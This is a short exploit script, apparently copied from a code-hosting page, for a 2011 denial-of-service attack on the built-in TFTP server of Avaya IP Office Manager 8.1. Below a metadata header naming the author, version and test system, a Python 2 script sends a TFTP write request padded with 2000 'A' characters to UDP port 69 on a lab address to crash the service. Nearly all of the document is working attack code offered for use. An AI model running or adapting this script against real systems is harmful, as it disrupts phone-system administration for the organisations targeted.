23 lines
No EOL
833 B
Python
Executable file
23 lines
No EOL
833 B
Python
Executable file
#Exploit Title: Avaya IP Office Manager TFTP DOS
|
|
#Version: Avaya IP Office Manager 8.1 (5)
|
|
#Author: Craig Freyman (cd1zz)
|
|
#Date: March 23, 2011
|
|
#Description: Avaya IP Office Manager is the management console for Avaya IP Office phone systems.
|
|
#There is a built in TFTP server that is used to update the firmware on phones. The TFTP service
|
|
#is loaded when the admin console is opened. I was not able to overwrite any registers or the SEH.
|
|
#Software Link: ftp://ftp.avaya.com/incoming/Up1cku9/SoftwarePub/6_1GA_Builds/ADMIN6_1_5.exe
|
|
#Tested on: Windows XP SP3
|
|
|
|
#!/usr/bin/python
|
|
import socket
|
|
|
|
host = '192.168.133.131'
|
|
port = 69
|
|
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
|
|
|
crash = "A" * 2000
|
|
|
|
print "Sending crash...."
|
|
pwned = "\x00\x02" + "A" + "\x00" + crash + "\x00"
|
|
s.sendto(pwned, (host, port)) |